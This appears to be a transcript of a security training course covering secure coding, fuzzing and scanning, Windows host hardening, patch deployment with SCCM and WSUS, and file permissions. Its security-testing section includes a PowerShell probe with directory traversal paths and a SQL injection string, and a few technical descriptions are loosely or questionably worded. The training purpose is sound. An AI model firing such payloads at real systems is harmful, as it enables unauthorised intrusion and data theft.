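# $claimedLength is the payload length the client says it sent
# $received is the byte array the server actually read from the request
if ($claimedLength -le 0 -or $claimedLength -gt $received.Length) {
    # Claimed length doesn't match reality - discard the request
    throw "Declared payload length does not match the data received"
}
# Only ever echo back bytes the client actually supplied
$reply = $received[0..($claimedLength - 1)]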
So essentially, an attacker could cause the server to read and return the contents of memory beyond the end of
the submitted packet data. And that, of course, violates secure coding practices. With secure coding, best
practices and recommendations will vary from programming language to programming language. So, whether we're scripting in a Unix or a Linux shell of some type, using Visual Basic or Microsoft PowerShell, or writing in languages like C, C++, Java, and Python, there will be different best practices and recommendations, although there are some common threats. [The Secure Coding Cheat Sheet web page of the www.owasp.org web site is
there are some common threats. [The Secure Coding Cheat Sheet web page of www.owasp.org web site is
open. The web page is divided into two sections. The first section contains the navigation pane. The navigation
pane includes links such as Home, Books, and News. By default, the Home link is selected. The second section
includes the Page and Discussion tabs. By default, the Page tabbed page is open. The content of the Home link
is displayed in the second section. The second section includes links such as the Introduction, Session
Management, Input Data Validation, and Cryptography.] Consider, for example, the OWASP Secure Coding
Cheat Sheet on the screen now. In the overview or table of contents, we can see the categories related to secure coding – for example, User Authentication, Session Management, and Input Data Validation. Let's go ahead and click on that last one.
[He clicks the Input Data Validation link and its web page opens. This web page includes URLs such as
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet and
http://www.owasp.org/index.php/Logging_Cheat_Sheet. He clicks the
http://www.owasp.org/index.php/Input_Validation_Cheat_Sheet URL.] Here, we can click the link to read
about Input Data Validation as it relates to secure coding. [The Input Validation Cheat Sheet web page opens
in the www.owasp.org web site.] Now remember, it's going to vary whether you're using Python or C++ or
Java to write your code. But now that we're in the input validation documentation, we can start to go down and
read a little bit about the detail related to that. For example, with Java whether we're using server-side or
client-side code and so on. [He resumes the explanation of the secure coding. He is referring to the following
lines of code: $admin_privilege=$true, try, {, custom_function arg1 arg2, if ($condition -eq "Value"), {,
$admin_privilege=$true, }, }, catch. Code ends.] As a simple example, consider the code on the screen, where
an admin_privilege variable is being set to a value of true. Then we've got a try/catch block, which captures runtime problems or errors. Inside it, we're running a custom function and giving it some arguments. Then there's an if statement testing a condition, and it sets the admin_privilege variable to true again.
Now the problem with this code is that the admin_privilege variable is set to true outside of the try/catch error-handling structure, before any condition has been validated. We don't want to grant privileges unless very specific conditions are met in a proper fashion. This type of obvious error would, more likely than not, be picked up quickly by another set of eyes through peer review. In this video, we discussed secure coding.
In this video, you will learn how to properly test technology solutions for security.
Objectives
[Topic title: Security testing. The presenter is Dan Lachance.] In this video, I'll talk about security testing.
Security testing might be required by law or for regulatory compliance. In some cases, we might need to go
through third-party businesses to make sure that we have proper security testing in place to secure contracts.
Then, of course, we might have to pass audits or achieve some kind of accreditation such as PCI-DSS. Now
the PCI-DSS standard applies to organizations that work with card-holder data – such as credit and debit cards
to make sure that that data is protected properly.
Fuzzing means that we are feeding abnormal data to an application and we want to observe its results. So, for
instance, we might pass a number to a string variable, read beyond the memory required to store a value – as was the problem with the Heartbleed bug – or verify that the application can't be made to crash, which would amount to a denial of service. Many tools can be used to execute multiple fuzz tests against a target. So it could
be manual. But often, it's done in an automated fashion using a tool designed specifically for fuzz testing. Now
fuzz testing must be done from the perspective of a malicious user or a security tester just testing an
application.
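As a simple illustration, here is a minimal PowerShell sketch of an automated fuzz run against a hypothetical test form (the URL and field name are made up); dedicated fuzzing tools do this far more thoroughly:

$target = "http://testserver.example.com/submit"   # hypothetical test endpoint
foreach ($i in 1..100) {
    # Build a random-length blob of random bytes as the "abnormal" input
    $length = Get-Random -Minimum 1 -Maximum 5000
    $bytes  = [byte[]](1..$length | ForEach-Object { Get-Random -Minimum 0 -Maximum 256 })
    $body   = @{ comment = [Convert]::ToBase64String($bytes) }
    try {
        Invoke-WebRequest -Uri $target -Method Post -Body $body -UseBasicParsing -TimeoutSec 10 | Out-Null
    } catch {
        # Invoke-WebRequest throws on 4xx/5xx responses, so crashes and server
        # errors surface here for review
        Write-Warning "Iteration $i triggered: $($_.Exception.Message)"
    }
}

We would then review the warnings, along with the application's own verbose logs, for crashes or leaked details.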
A web application vulnerability scan is another way to test the security of an application. Now, again, this can
be manual or automated. There are tools such as Nexpose, Nikto, or Qualys-related tools that will do this type
of web app vulnerability scan for us, checking for things like standard misconfigurations or the allowing of directory traversal through the web app's file system. It'll also check for the possibility of SQL injection attacks
due to improper field validation on web forms and also things like remote command execution.
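Tools like Nikto, Nexpose, or the Qualys scanners automate those checks. Purely to illustrate what one such check does, a hand-rolled PowerShell probe for directory traversal and SQL injection symptoms might look like this (the URL, parameter, and response patterns are hypothetical):

$base = "http://testserver.example.com/view?file="   # hypothetical vulnerable parameter
$payloads = @(
    "../../../../etc/passwd",        # Unix directory traversal
    "..\..\..\windows\win.ini",      # Windows directory traversal
    "' OR '1'='1"                    # classic SQL injection probe
)
foreach ($p in $payloads) {
    try {
        $r = Invoke-WebRequest -Uri ($base + [uri]::EscapeDataString($p)) -UseBasicParsing -TimeoutSec 10
        # Look for tell-tale strings in the response body
        if ($r.Content -match 'root:x:|\[fonts\]|SQL syntax') {
            Write-Warning "Possible vulnerability with payload: $p"
        }
    } catch {
        # 4xx/5xx responses land here; a 500 error can itself indicate poor input handling
        Write-Warning "Payload '$p' caused: $($_.Exception.Message)"
    }
}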
A static code analysis is another part of security testing for an app; it's often called white box testing. It applies to both compiled and noncompiled code. It examines an application's inputs as well as the outputs that result from what is fed into the app. It's used to detect flaws, including things like backdoors. Backdoors
allow a malicious user into the application with escalated privileges without the system owners' knowledge. A
regression analysis can also be conducted. It's also considered to be a predictive analysis where we look at the
varying relationships between different application components. Sometimes, when you do security testing on
one component of an application, it appears to be solid. But, when we look at the interactions and add more moving parts, we might realize that there is some kind of security vulnerability.
So sometimes we might, for instance, have a code variable that ends up with differing values when it is passed to a different application component. An interception proxy can also be used as part of security testing. This is also called an inline proxy. It's used to crawl a web application – in other words, to pore over it looking
for weaknesses. The interception proxy also has the ability to capture and replay web-specific traffic for an
application where parameter values can be modified. So this is really akin to a man-in-the-middle attack, but
it's part of testing. We have to account for the fact that there are malicious users that will perhaps attempt these
types of attacks. And we have to think in the same way.
Interception proxies, however, are invisible to client web browsers. Now an example of an interception proxy
is the OWASP Zed Attack Proxy. [The OWASP Zed Attack Proxy Project web page is open in the
www.owasp.org web site. The web page is divided into two sections. The first section contains the navigation
pane. The navigation pane includes links such as the Home, Chapters, and News. By default, the Home link is
selected. The second section includes the Page and Discussion tabs. By default, the Page tab is open. The
Page tabbed page includes the Main, News, and Talks tabs. By default, the Main tabbed page is open. The
Main tabbed page includes the Download ZAP button, Download OWASP ZAP! link, and zap-extensions
link.] So, if you search up OWASP and Zed Attack Proxy, which I've done here, it's pretty easy to find the
web page that explains what the purpose of this is. Its purpose is to help find security vulnerabilities in web
applications. And really, this is a tool that we could use at various phases of the system development life cycle.
So there are plenty of tools that are available to automate security testing also in the form of interception
proxies, as seen here. [Dan resumes the explanation of security testing.] Despite our best technical efforts to
secure an application...and it's very important that we do this, in the end, user acceptance testing is what really
solidifies our solution as being usable. Does the solution behavior align with design requirements, and are user
needs addressed with our solution?
So end-user acceptance testing might bring to light problems that were missed during earlier testing. Maybe, for example, we've got a calculation feature in a web app that does work but is unacceptably
slow. We also have to think about regulatory and contractual compliance to make sure that the solution aligns
with those. In this video, we talked about security testing.
[Topic title: Host Hardening. The presenter is Dan Lachance.] In this video, I'll demonstrate how to harden a
Windows host to reduce the attack surface. The first thing that we should keep in mind is that reducing the
attack surface really means keeping only the things running that are absolutely required on that host operating system. Now at the same time, we need to make sure software updates have been applied. [The Start page is
open. The page includes a search bar. Dan types update Services in the search bar. Then the links such as the
Windows Server Update services and the Windows Update link appear.] So here in my Windows Server, I'm
going to go to my Start menu and type in the word "update" and I'm going to choose Windows Update. [The
Windows Update page opens. The page is divided into two sections. The first section includes clickable
options such as the Check for update, Change settings, and View update history. The second section includes
the Download and install updates section. The Download and install updates section includes the Install
updates button.] On this particular host, we notice that we have the option to download and install updates in
the amount of 945 megabytes. So clearly, this machine is not fully up to date. However, I can see down below
when it most recently checked for updates. So today at 10:22 a.m. And I can see when updates were last
installed.
At the same time on the left, I can also View update history. [He clicks the View update history link and View
update history page opens. A table is displayed on this page. This table has four columns and several rows.
The column headers are Name, Status, Importance, and Date installed.] So I can see the individual updates
and whether or not the Status is Succeeded, the Importance of the update, and when it was installed. But how
do you deal with that on a large scale in an enterprise? For instance, if you're a datacenter administrator, how
do you make sure that your hypervisor hosts have all the updates? Surely, there's a better way than going to
each and every one and doing it manually. And of course, there is. [He opens the System Center Configuration Manager from the task bar.] We're going to do that by using the SCCM management tool. System Center Configuration Manager is a product from Microsoft's System Center suite.
[The System Center Configuration Manager window is divided into two sections. The first section includes two
subsections. The second subsection includes the Assets and Compliance and Software Library tabs. The
Software Library tab is selected by default. The first subsection is the navigation pane. The navigation pane
includes the Overview root node. The Overview root node is selected. Under the Overview root node, the
Software Updates node is selected. Under the Software Updates node, the Software Update Groups folder is
selected. The second section includes a search bar and a table. The table contains nine columns and two rows.
The column headers are Icon, Name, Description, Date Created, Last Date Modified, Percent Compliant,
Created By, Deployed, and Downloaded. In the second row, the entry under the column header Name is Win 7
Required Updates, the entry under the column header Date Created is 4/7/2016 11:19 AM, the entry under the
column header Last Date Modified is 4/7/2016 11:19 AM, the entry under the column header Percent
Compliant is 33, the entry under the column header Deployed is Yes, and the entry under the column header
Downloaded is Yes.] Now here, I've gone into the Software Library workspace in the bottom-left. And over in
the left-hand navigator, under Software Updates, I'm going to click All Software Updates. [The All Software
Updates includes a table. The table includes eight columns and several rows. The column headers are Icon,
Title, Bulletin ID, Required, Installed, Percent Compliant, Downloaded, and Deployed. One row is
highlighted. In this row, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 100, the entry under the column header
Downloaded is Yes, the entry under the column header Deployed is Yes.] So what SCCM can do is it can
synchronize software update metadata, even from Microsoft Online, which it's done here. And we're looking at
the metadata here. And then from here, I can work with it and get it deployed internally. Ideally, a single
configuration could deploy required updates to potentially thousands of computers. So I don't have to visit
each of those computers for update purposes. So when I'm looking at an update here, [He is referring to a row
whose entry under the column header Title is Critical Update for Office 2003, the entry under the column
header Required is 0, the entry under the column header Installed is 0, the entry under the column header
percent compliant is 100, the entry under the column header is Downloaded is No, and the entry under the
Deployed column header is No. He right-clicks on this row and a flyout appears. The flyout includes options
such as Download, Deploy, and Move.] I could right-click on it and actually Download the binary files for it.
Because again, the only thing you're seeing here when you're looking at updates is the metadata – not the actual files that comprise the update; those need to be downloaded. And we can see that option here when we
right-click on a single update.
Now we also have the option of Deploying the update to a device collection. [He clicks the Deploy option
and the Deploy Software Updates Wizard opens. This is divided into two sections. The first section includes
the General, Deployment Settings, and Alerts links. By default, the General link is selected. The second section
includes the Deployment Name text box, Collection text box, and Browse button. At the bottom right-hand
side, there are Next and Cancel buttons.] Down here at the bottom, I'll click the Browse button. [The Select
Collection dialog box opens. This dialog box is divided into two sections. The first section includes a drop-
down list and a navigation pane. The navigation pane includes the Root node. The Root node includes the
Toronto Collections subnode. The second section includes a search bar. At the bottom right-hand side, there
are OK and Cancel buttons. ] And I have the ability of selecting a collection, which is, really, just a group of
computers that I could have customized to deploy the updates to. [He clicks the Cancel button and switches
back to the Deploy software updates wizard. He clicks the Cancel button and the Configuration Manager
dialog box opens. This dialog box includes the Yes button and the No button. He clicks the Yes button and
switches back to the System Center Configuration Manager.] However, because updates are numerous, we
probably don't want to do that for individual updates like I've just demonstrated. Instead, for instance, you can
use Ctrl+click to select numerous updates. You could also search for updates here, up in the bar at the top.
Either way, when you've got multiple updates selected, you can right-click on them and Create Software
Update Group. [He has selected various rows in the table and right-clicks on one of the selected rows and then
a flyout appears. He highlights the Create Software Update Group option.] So they're grouped together in one
lump, instead of dealing with each individual update. Because, for instance, with Windows Server 2012 R2,
you know, on patch Tuesday, the second Tuesday of each month when Microsoft releases most of the updates,
you could have hundreds of updates. You probably want to group them into a single Software Update Group.
[He selects the Software Update Groups view present under the Software Updates folder.] Now I've already
got some created. So let's click on that Software Update Groups view on the left. And what I would do on the
right is right-click on the Software Update Group, Download the actual update files, and then Deploy to a
collection. So that way, we're doing it on a larger scale. But hardening a system takes more than just deploying updates. [He minimizes the screen and switches back to the View update history screen.] What about
disabling unneeded services? Let's close down some of these screens, and let's go ahead and open up our list of
services here in Windows. [He opens the Services window. The screen is divided into two sections. The first
section includes the navigation pane. The second section includes a table with five columns and several rows.
The column headers are Name, Description, Status, Startup Type, and Log On As. He double-clicks the row
whose entry under the column header Name is BranchCache.] Here I've selected the BranchCache service for
my example. Let's say we know we don't need the BranchCache feature, so I'm going to go ahead and double-
click. [The BranchCache Properties dialog box opens. It includes the General and Log On tabs. By default,
the General tabbed page is open. It includes the Startup type drop-down list, OK button, Apply button, and
Cancel button.] Here the Startup Type has been set to Automatic. Now you have to be careful with this. You
have to do a bit of research and testing to ensure that no other services or components depend on this service being running.
So it requires a bit of homework ahead of time. But once you're sure it doesn't need to be running, you might
change its Startup type. For example, here I might change it to Manual or completely Disabled. Now, if I were
to do that, for instance, set the Startup type to Manual, [He selects the Manual drop-down option in the Startup
type drop-down list.] I could Apply the change. But notice that the Service would still be Running, so I could
also Stop it. So it's important, whether we're using a Windows, Linux, or UNIX operating system, that we take a look at the services – or, in Linux, the daemons – that are running and determine which ones should be disabled. In the UNIX and Linux world, you're really disabling them for given run levels in many distributions. [He clicks the Cancel button.]
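The same change can be scripted; here is a minimal PowerShell sketch, assuming you've confirmed the service's short name first (for BranchCache it is typically PeerDistSvc, but verify with Get-Service on your system):

# Look the service up by display name to confirm its short name and status
Get-Service -DisplayName "BranchCache"

# Stop it if it's running, then prevent it from starting automatically
Stop-Service -Name PeerDistSvc
Set-Service  -Name PeerDistSvc -StartupType Disabled   # or Manual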
Now aside from that there are other things that we should bear in mind too. [He closes the Services
window.] Here on my Windows Server, I can go ahead and open up my Local Group Policy Editor. [The
Local Group Policy Editor is divided into two sections. The first section is the navigation pane and the second
section is the content pane. The content pane includes a table with two columns and several rows. The column
headers are the Policy and the Security Setting.] Now in an Active Directory environment, you can configure
Group Policy Objects or GPOs, which could be applied to potentially thousands of computers that are joined to
your Active Directory domain. But here, I'm just going to configure my Local Group Policy. Either way, we've
got thousands of settings here that we could use to harden a host. So in the left-hand navigator in my Local
Computer Policy, you can see clearly, I've already gone under Computer Configuration - Windows Settings -
Security Settings. And, for instance, here under Local Policies, I have numerous security options that I could
apply to this server.
I've got Account Policies where I could configure the Password Policy – things like password reset settings,
minimum and maximum password age, and so on. Of course, every device on a network, whether it's a server
or a smartphone should have a host-based firewall. [He clicks the Windows Firewall with Advanced Security node. The content pane includes the Overview section and the Getting Started section.] So I could configure the inbound and outbound firewall rules on this server in this manner. [The Windows Firewall with Advanced Security node includes the Inbound Rules and the Outbound Rules nodes. He clicks the Inbound Rules node and then clicks the Outbound Rules node.] Of course, there are other ways to do it
including at the command line. I could also configure things like Software Restriction Policies – or, in newer versions of Windows, Application Control Policies – to determine exactly which processes are allowed to run on this particular host.
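For reference, host firewall rules can also be scripted with the built-in NetSecurity cmdlets; a rough sketch, where the rule names and ports are just examples:

# Allow inbound HTTPS to this server
New-NetFirewallRule -DisplayName "Allow inbound HTTPS" -Direction Inbound `
    -Protocol TCP -LocalPort 443 -Action Allow

# Block outbound Telnet from this server
New-NetFirewallRule -DisplayName "Block outbound Telnet" -Direction Outbound `
    -Protocol TCP -RemotePort 23 -Action Block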
[He resumes from the desktop screen.] Of course, another aspect of hardening operating systems is to ensure
you have some kind of up-to-date and reliable antimalware scanner. Here, in my server, I'm going to search for
endpoint. [The start page opens and he types the endpoint protection in the search bar.] Here I'm using
System Center Endpoint Protection but really any antimalware solutions generally have the same configuration
settings. [He clicks the System Center Endpoint Protection link and the System Center Endpoint Protection
dialog box opens. The dialog box includes the Home tab, Update tab, and History tab. By default, the Home
tabbed page is open. There is a Scan options section on the right side. The Scan options includes the Quick
radio button, Full radio button, Custom radio button, and Scan now button. It includes the Quick radio button,
Custom radio button, and Scan now button.] So whether or not Real-time protection is enabled...here it's
Disabled on this server. But really it should be enabled. Notice that the Virus and spyware definitions here are
Up to date. Of course, if I go to the Update tab, I can see when that occurred. [The Update tabbed page
includes the information about the Definitions created on, the Definitions last update, and the Update
definitions button.] I can also get a list of History for quarantined or removed items. [He clicks the History
tab. The history tabbed page includes the Quarantined items and Allowed items radio buttons.] And I also
have numerous Settings. [He clicks the Settings tab. The Settings tabbed page includes two sections. The first
section includes the Scheduled scan, Default actions, and MAPS options. The second section includes the Scan
type drop-down list and the Cancel button.] Now notice a lot of them are grayed out. That's because these settings can be centrally controlled.
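Before looking at the central console, note that on hosts using the built-in Windows Defender engine, the same status checks and actions can also be scripted locally with the Defender module; a minimal sketch (cmdlets will differ for third-party scanners):

# Confirm real-time protection is on and definitions are current
Get-MpComputerStatus |
    Select-Object RealTimeProtectionEnabled, AntivirusSignatureLastUpdated

# Pull the latest definitions and run a quick scan
Update-MpSignature
Start-MpScan -ScanType QuickScan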
[He maximizes the System Center Configuration Manager present in the task bar.] In this case, that's done
using SCCM. That would be under the Assets and Compliance workspace in the bottom left, where under my
left-hand navigator, I could expand Endpoint Protection. [He expands the Endpoint Protection folder. It
contains the Antimalware Policies and the Windows Firewall Policies. He clicks the Antimalware Policies.
The content pane includes a table with six columns and two rows. The column headers are Icon, Name, Type,
Order, Deployments, and Description. He clicks the row whose entry under the column header Name is
Default Client antimalware policy, the entry under the column header Type is Default, the entry under the
column header Order is 10000, and the entry under the column header Deployments is 0. Then the Default
Antimalware Policy dialog box opens. It is divided into two sections. The first section is the navigation pane
and it includes the Scheduled scans, scan settings, and Default actions options. The second section is the
content pane. It includes the Scan type drop-down list and the Scan time drop-down list. At the bottom right-
hand side of the Default Antimalware Policy dialog box are the OK and Cancel buttons.] And I could
configure Antimalware Policies that would be applied to the stations being managed by SCCM. Now, of course, you've got numerous other things you should be doing to make sure hardening is
effective like periodic penetration testing and so on. In this video, we discussed ways of hardening a host to
reduce the attack surface.
Upon completion of this video, you will be able to recognize the importance of keeping hardware and software
up to date.
Objectives
[Topic title: Patching Overview. The presenter is Dan Lachance.] In life, nothing is perfect and that includes
firmware and software. One great countermeasure is to make sure these things are patched periodically.
Vulnerabilities get discovered over time with both firmware code and software. Patching can fix security and
stability problems discovered. When we decide that we're going to deploy patches especially on a larger scale,
we need a way to monitor that patch deployment to ensure it succeeded. We also should have an enterprise-
class solution that allows us to monitor for patch compliance so that at any given moment, we can run a report
to see which devices on the network do not comply with the latest patches and therefore present a security risk.
Many modern solutions also allow us to inject patches into operating system images. So, for example, we might
have a Windows 10 standard corporate image that we deploy to new desktops. But, if that image was built a
year ago, generally speaking, it's a year out of date with patches. So there are solutions such as Microsoft
System Center Configuration Manager, among others, that allow us to inject patches into the image itself even
without it being deployed. The benefit here is that when we deploy that image, it's up to date with the latest
patches.
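Outside of SCCM, the same idea can be done offline with the built-in DISM tool; a rough sketch, with hypothetical paths, of injecting an update package into a Windows image:

# Mount the image, add the update package, then commit the change (paths are examples)
Dism /Mount-Image /ImageFile:C:\Images\install.wim /Index:1 /MountDir:C:\Mount
Dism /Image:C:\Mount /Add-Package /PackagePath:C:\Updates\windows-update.msu
Dism /Unmount-Image /MountDir:C:\Mount /Commit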
[The System Center Configuration Manager window opens. The window is divided into two sections. The first
section is divided into two subsections. The second subsection includes the Software Library and Monitoring
tab. The first subsection is the navigation. In the navigation pane, the Overview root node is selected. Under
the Overview root node, the Operating systems node is open. Under the Operating Systems node, the
Operating Systems Images subnode is open. The second section includes a search bar and a table. The table
contains information about Windows 7 ENTERPRISEN.] For example, here in Microsoft System Center
Configuration Manager, I've got a Windows 7 ENTERPRISEN image. And, if I were to right-click on it, [A
flyout opens. The flyout includes options such as Schedule Updates, Refresh, and Delete.] I have the option to
Schedule Updates. [Dan clicks the Schedule Updates option and the Schedule Updates Wizard opens. The
Wizard is divided into two sections. The first section includes the Choose Updates, Set Schedule, and Summary
links. By default, the Choose Updates is selected. The second section includes the Select or unselect all
software updates in this list checkbox, the System architecture drop-down list, and a search bar. At the bottom
right-hand side of the Schedule Updates Wizard are the Next button, Summary, and Cancel buttons.] Now
when that dialog box opens up, the first page of the wizard gives me a list of related updates. In this case, for
Windows 7. And I can select or deselect the appropriate updates. Now when I click the Next button at the
bottom, I can then schedule when I want these injected into that image. [He clicks the Next button and the Set
Schedule page opens. It includes the As soon as possible radio button, the Continue on error checkbox, the
Update distribution points with the image checkbox, and the Next button. By default, the as soon as possible
radio button, the Continue on error checkbox, and the Update distribution points with the image checkbox are
selected.] So the beauty here is that when I deploy that Windows 7 ENTERPRISEN image in this specific
example, it will be up to date.
[He resumes the explanation of patching overview.] As mentioned, patching also deals with firmware updates.
So, at the hardware level, that includes things like BIOS updates on motherboards, wireless router firmware
updates to close security holes, printer firmware updates, router firmware updates, switches, mobile devices –
like smartphones, and Internet of Things or IoT firmware updates. These days IoT is used for a lot of consumer
devices like home video surveillance systems and the remote capability to control heating and lights and so on.
All of these types of firmware need to have the latest patches applied to make sure they work correctly, support
enhanced features, and, of course, close any known security vulnerabilities.
At the software level, of course, patching will apply fixes to operating systems, drivers, applications running
within the operating systems, or even mobile devices and the apps running on them. Pictured on the screen, we
see a screenshot of Windows Server Update Services or WSUS. [Running along the top of the Update Services
window is the menu bar. It includes menus such as the File, Action, and Window. The rest of the screen is
divided into two sections. The first section includes the navigation pane. In the second section, the Approved
Updates dialog box is open.] Now unlike SCCM, WSUS is available for free from Microsoft with their server
products. And what we see pictured here is a number of approved updates being applied for a group. We can
see in the left part of the diagram, we've got a Halifax_Computers group as well as an Update_Testing group.
These are groups of computers that we can target approved updates to. This way we know exactly which
devices are receiving which patches.
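WSUS approvals can also be scripted on the WSUS server itself with the UpdateServices module; a hedged sketch, where the target group name matches the example above and the parameter values may need adjusting for your server:

# List updates that clients still need but that haven't been approved yet
Get-WsusUpdate -Approval Unapproved -Status FailedOrNeeded

# Approve them for installation by the Update_Testing computer group
Get-WsusUpdate -Approval Unapproved -Status FailedOrNeeded |
    Approve-WsusUpdate -Action Install -TargetGroupName "Update_Testing"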
[He resumes the explanation of the patching overview.] Patching should also include deadlines whereby we
provide a notification to the user that a deadline is approaching and the patches will apply – regardless of what
the user selects. However, when we apply patches, this can slow down the computer and the network. And the
last thing we really want to do is hamper user productivity. But, at the same time, we must adhere to
organizational security standards for patching and security. So what we might do is configure maintenance
windows. A maintenance window is supported by various products and it's usually after hours where
maintenance is allowed, such as the application of software updates. The idea with the maintenance window is
to minimize the disruption to the end user. We can also configure the reboot behavior. So for example, if a user
is using their laptop to present something in a boardroom, we don't want their computer rebooting in the
middle of their presentation.
So, of course, there are many ways to get around that, including making sure that we use maintenance
windows after hours. Also, some software tools can run in presentation mode and will ignore things like patch reboot requirements until our presentation is complete. License agreements apply to some software updates. Accepting them might be automated, or the end user might have to interact with the installation of the update to accept the license agreement.
In this video, learn how to apply patches properly to secure network hosts.
Objectives
[Topic title: Use SCCM to Deploy Patches. The presenter is Dan Lachance. Dan resumes from the System
Center Configuration Manager, and the Software Updates folder is open.] In this video, I'm going to
demonstrate how to use System Center Configuration Manager to deploy patches. We all know that one
important part of hardening hosts is to apply operating system and application software updates. Microsoft
SCCM or System Center Configuration Manager has a built-in way to centrally deploy updates and also run
reports to make sure that they were deployed successfully. In the SCCM management console on the left, I've
already gone under the Software Library workspace in the bottom left. And on the left, in the navigator, I've
gone under Software Updates.
Now it's already been configured to synchronize Software Updates metadata with Microsoft Online. So now
that I've done that, I'm going to click on All Software Updates on the left, which shows me many software
updates. [The Software Updates folder includes the All Software Updates and the Software Update Groups
options. Then, in the content pane, information about many software updates is displayed in a table with eight
columns and several rows. The column headers are Icon, Title, Bulletin ID, Required, Installed, Percent
Compliant, Downloaded, and Deployed.] Actually, specifically the metadata on the right-hand side. So we've got updates for Office 2003, some .NET Framework updates, and, as I go down through the list, numerous other updates. Now of course, if you're going to be working with deploying updates centrally
in some kind of management tool, you want to make sure that you're only synchronizing updates for software
that you use. Now SCCM on its own, by default, only allows you to deploy updates for Microsoft products. If you need to deploy updates for other products, like Symantec or McAfee or Adobe and so on, then
either use some other tool outside of Microsoft or you can use the Microsoft System Center Update Publisher
tool, which you have to download and configure.
Anyway, here in All Software Updates, I could right-click an individual update that I want deployed to a
machine or machines. [He right-clicks the row whose entry under the column header Title is Update for
Microsoft Outlook 2010, the entry under the column header Required is 0, the entry under the column header
Installed is 0, the entry under the column header Percent Compliant is 0, the entry under the column header
Downloaded is No, and the entry under the column header Deployed is No. Then a flyout appears and it
includes the Download, Deploy, and Move options.] I could Download the binary files for that update because,
again, all we're looking at here is the metadata for the updates. And then I could deploy it by clicking
Deploy [The Deploy Software Updates Wizard opens. It is divided into two sections. The first section is the
navigation pane. The navigation pane includes links such as General, Deployment Settings, and Alerts. By
default, the General link is selected. The second section includes the Browse button and the Deployment Name
text box. At the bottom right-hand side of the Deploy Software Updates Wizard are the Cancel and Next
buttons.] and then specifying a device collection. [He clicks the Browse button and the Select Collection
window opens. The window is divided into two sections. The first section includes a drop-down list and the
navigation pane. The second section includes a search bar.] So you can't deploy updates to collections of
users. In SCCM, a collection is like a group. So you could have groups of computers that mirror departments,
the type of operating system, or the fact that they're laptops, or even geographical locations – it doesn't matter.
But once your collections are built, then it facilitates deploying things to them. In this case, software
updates. [He clicks the Cancel button and resumes from the Deploy Software Updates Wizard.]
Now instead of deploying individual updates normally, [He clicks the Cancel button and then the
Configuration Manager dialog box opens. He clicks the Yes button and the dialog box closes. He switches
back to the System Center Configuration Manager.] what one would do with this tool is select numerous
updates and put them in a software update group and manage the group of updates as one entity instead of individually. So what I could do here is manually go through the list and, for example, Ctrl+click to select
multiple updates or over in the upper right, I could click Add Criteria and I could search for update metadata
that meet certain conditions. [He clicks the Add Criteria drop-down list. It includes Product, Total, and Type
drop-down options and the Add and Cancel buttons.] So maybe, what I'll do here is I'll search for things like
Product. I'll click Add. Now here, it's already got the product it's searching for – Active Directory Rights
Management Services Client 2.0 – that's not what I want. I'll go ahead and click on that link. [He clicks the
Active Directory Rights Management Services Client 2.0 link and a drop-down list appears. It includes the
Windows 7 and the Windows 8 drop-down options.] And maybe here, I'm just going to scroll all the way down
and I'm going to choose, for instance, Windows 7 assuming that's what I'm using in my environment. Then I'll
go ahead and click Search.
Now of course, I could add multiple criteria here to look for specific Windows 7 updates. But, in this case, I've got all my Windows 7 updates listed in my search results. So what I would do at this point is, for example,
click in the list and press Ctrl+A to select them all. And here, I'm going to right-click and choose Create Software Update Group, which I'll name Win 7 Updates - All. [He selects the Create software update group option from
the flyout. Then the Create Software Update Group dialog box opens. It includes the Name text box, the
Description text box, the Create button, and the Cancel button.] And I'll Create that update group. [He types
Win 7 Updates - All in the Name text box and then clicks the Create button.] So it's always easier to manage
things on a larger scale in groups rather than individually. Now that's going to show up under the Software Update Groups view, which I'll click on the left. So we can see on the right here now that we've got our Win 7
Updates - All software update group. So from here, I would right-click and Download all of the files and then I
would Deploy it to a device collection. Now that will take time depending on how many updates are involved
in the update group and what your internet connection speed is like.
But once that's been done, under the Monitoring tab, down in the bottom left, and then in the Reporting area,
on the left in the navigator, I could expand reports. Here, I've got numerous report categories that I could work
with to see if software updates have been applied correctly. So notice all the Software Updates categories of
Reports, such as Software Updates – C Deployment States. So I could click on that and here I have numerous
reports I could run. [The content pane includes various reports such as the States 1 - Enforcement states for a
deployment and the States 2 - Evaluation states for a deployment.] Now running the report, of course, simply
means right-clicking and choosing Run. [He right-clicks the States 2 - Evaluation states for a deployment
option. Then a flyout appears and selects the Run option. Then the States 2 - Evaluation states for a
deployment window opens.] And, in some cases, some reports will have parameters that you must specify, like
date ranges or collections. But either way, this is a nice centralized way on a larger scale to deploy and manage
and monitor updates. In this video, we learned how we can use SCCM to deploy patches.
During this video, you will learn how to set the correct access to file systems while following the principle of
least privilege.
Objectives
set the correct access to file systems while adhering to the principle of least privilege
[Topic title: File System Permissions. The presenter is Dan Lachance. The Active Directory Users and
Computers window is open. Running along the top is the menu bar. It includes the File, Action, and Help
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The Active
Directory Users and Computers is the root node, which includes the Saved Queries folder and the
fakedomain.local node. The fakedomain.local node includes Builtin, Computers, Users, and Managed Services
Accounts folders. By default, the Users folder is selected. The second section of the screen is the content pane.
It contains a table with three columns and several rows. The column headers are Name, Type, and
Description. By default, the row whose entry under the column header Name is Help Desk and the entry under
the column header Type is Security Group is highlighted.] In this video, I'll demonstrate how to set NTFS file
permissions on a Windows Server. Whenever we assign permissions to any type of network resource, we need
to make sure that we're adhering to the principle of least privilege, which means granting only enough privileges for a task to be completed and nothing more. So in the Windows world, for
instance, the last thing we want to do when someone needs basic file system access is to add them to an
administrators group. That's way too much power. Here in Active Directory Users and Computers, we've got a
user called HelpDesk User1. And, if we open up the Help Desk group by double-clicking it and go to the Members tab,
we can see that that user is a member of the Help Desk group. [Dan double-clicks the row with the entry Help
desk, and the Help Desk Properties dialog box opens. The Help Desk Properties dialog box includes the
General tab, the Members tab, and the Managed By tab. He clicks the Members tab. The Members tabbed
page includes the Add, Remove, and OK buttons. He clicks the OK button and the Help Desk Properties dialog
box closes.]
[The Data (I:) window opens. Running along the top is the menu bar. It includes the File, Share, and View
menus. The rest of the screen is divided into two sections. The first section is the navigation pane. The
navigation pane includes the Favorites, This PC, and Network nodes. The Favorite node includes the Desktop
and the Downloads subnodes. The This PC node includes the Desktop, Data (I:), and Videos subnodes. By
default, the Data (I:) subnode is selected. The second section contains the content pane. It includes the
Program Files folder and the UserDataFiles folder.] So let's go over to the file system where on Data (I:) –
